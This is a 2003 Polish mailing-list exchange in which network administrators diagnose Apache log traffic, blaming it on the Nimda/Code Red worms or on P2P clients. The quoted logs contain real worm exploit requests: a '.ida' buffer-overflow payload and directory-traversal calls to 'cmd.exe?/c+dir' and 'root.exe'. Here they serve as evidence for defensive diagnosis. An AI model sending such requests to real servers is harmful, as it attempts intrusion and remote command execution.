Hello Tomasz, Monday, January 20, 2003, 8:32:21 AM, you wrote:
TTC> Tomasz Jajonek napisał w dniu nie, sty 19, 2003 at 11:25:41 CET co następuje: TTC> : Hello t0masz, TTC> : TTC> : Sunday, January 19, 2003, 1:32:55 PM, you wrote: TTC> : : >>> on Sat, 18 Jan 2003 01:18:27 +0100 "Tomasz T. Ciaszczyk" <[EMAIL PROTECTED]> wrote: : >>> : >>> > 61.55.142.76 - - [12/Jan/2003:14:07:15 +0100] "GET : >>> /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a : >>> HTTP/1.0" 400 328 "-" "-" : >>> > 209.105.192.82 - - [12/Jan/2003:14:41:23 +0100] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 - "-" "-" : >>> > 194.27.78.23 - - [12/Jan/2003:16:22:31 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 286 "-" "-" : >>> > 194.27.78.23 - - [12/Jan/2003:16:22:34 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 284 "-" "-" : >>> > 194.27.78.23 - - [12/Jan/2003:16:22:44 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 294 "-" "-" : >>> > 194.27.78.23 - - [12/Jan/2003:16:22:48 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 294 "-" "-" : >>> i jeszcze coś: to chyba nie pochodzi z inetu, raczej ktoś spoofuje TTC> : TTC> : Ja mam to samo i nawet doszedlem to tego co to jest :-) Prawdopodobnie TTC> : masz siec i userow lubiacych Kazaa, eDonkeya z Mulem i ty podobnymi TTC> : smieciami. U mnie dochodzilo do paru tysiecy polaczen na Apacha na TTC> [...] TTC> : mam jeszcze czasami jakies polaczenia ale juz nie taka ilosc. Krotko TTC> : mowiac sa to smieci z programow Peer to Peer. TTC> I tutaj slonce sie mylisz.. TTC> Moja siec sklada sie z zupelnie innych klientow... I bron boze zadnych TTC> windowsow (poza jednym NT) w moim LANie nie ma.. TTC> Programow P2P tez nie ma.. TTC> W tym wypadku poprawna odpowiedz brzmiala: Nimbda (czy jak sie tam on TTC> zwal) wirus dla IIS'a. Niestety, ale userzy WinShitow nei zawsze mysla TTC> o tym ze wypada cos zabezpieczyc nawet jak im sie trabi o tym... TTC> Ciekawi mnie ile jeszcze wiekow bedzie uzywany niezabezpieczony Ajtjuk TTC> czy chociazby ten szczesny IIS. TTC> : Administrator sieci PROTONET TTC> Sam jestem adminem sieci, ale potrafie rozroznic ISP dajacego lacze (a TTC> szczegolnie na osiedlowki), od ISP hostingowego... TTC> PS2. W drugiej firmie mam wlasnie uzyszkodnikow uzywajacych P2P i TTC> jakos tam takich odwolan (o dziwo) nie mam. Kazy i inne muje dzialaja TTC> (a czemu by nie.. tylko ze z transferem 1kbps). Wcale nie twierdze, ze twoj problem napewno pochodzi od P2P ale w moim przypadku to jest 100% przyczyna. Mam pytanie czy w tych polaczeniach dominuje domena .dip.t-dialin.net ? Tak to wyglada u mnie na netstacie # netstat -a tcp 0 0 tomus.protonet.pl:www cliente-2172162400:1719 ESTABLISHED tcp 0 0 tomus.protonet.pl:www p509016CA.dip.t-di:1398 ESTABLISHED tcp 0 0 tomus.protonet.pl:www pD9E3F2D0.dip.t-di:4350 ESTABLISHED tcp 0 0 tomus.protonet.pl:www pD9E0C731.dip.t-di:2760 ESTABLISHED tcp 0 0 tomus.protonet.pl:www pD9538DE6.dip.t-di:1307 ESTABLISHED tcp 0 14280 tomus.protonet.pl:www 12-231-138-8.clie:24731 CLOSE_WAIT tcp 0 0 tomus.protonet.pl:www p508BDAE4.dip.t-di:3504 ESTABLISHED tcp 0 0 tomus.protonet.pl:www p508BDAE4.dip.t-di:4019 ESTABLISHED tcp 0 0 tomus.protonet.pl:www pD9E1DF6C.dip.t-di:2506 ESTABLISHED tcp 0 0 tomus.protonet.pl:www lns02v-1-181.w.clu:3536 ESTABLISHED tcp 0 0 tomus.protonet.pl:www ALyon-110-1-9-218.:3648 ESTABLISHED tcp 0 0 tomus.protonet.pl:www pD95413C9.dip.t-di:3850 ESTABLISHED tcp 0 0 tomus.protonet.pl:www p50847151.dip.t-di:2987 ESTABLISHED tcp 0 0 tomus.protonet.pl:www p508B0E30.dip.t-di:4537 ESTABLISHED tcp 0 0 tomus.protonet.pl:www p508BDAE4.dip.t-di:4692 ESTABLISHED # /var/log/apache/access.log 80.143.164.241 - - [20/Jan/2003:11:25:48 +0100] "\xe38" 200 13068 "-" "-" 217.234.95.86 - - [20/Jan/2003:11:25:52 +0100] "\xe3<" 200 13720 "-" "-" 217.229.166.5 - - [20/Jan/2003:11:25:52 +0100] "\xe3P" 200 13600 "-" "-" 217.230.37.92 - - [20/Jan/2003:11:25:58 +0100] "\xe3P" 200 13068 "-" "-" 80.132.113.81 - - [20/Jan/2003:11:26:00 +0100] "-" 408 - "-" "-" i jak sprawdzam polaczenia na iptrafie to znajduje polaczenia moich userow z tymi hostami. Zawsze jest to jakis P2P. Walcze z tym juz pare miesiecy zglaszalem kilkakrotnie problem do [EMAIL PROTECTED] jednak bez efektów. Blokowalem to portsentry i czym tylko to mozliwe jednak codziennie mialem po 8000-10000 nowych zablokowanych hostow. Poprostu nie do zablokowania. Problem dotyczy 2 moich serwerow w roznych sieciach. Administruje jeszcze 3 serwerami i tam nie ma sladu tego ustrojstwa wiec jak widzisz nie mam zasady. Moze jest to jakis rodzaj DDoS Attacks nie wiem mam nadzieje ze cos wymyslimy ;-) -- Tomasz Jajonek Administrator sieci PROTONET tel: 609-223-050 e-mail: [EMAIL PROTECTED]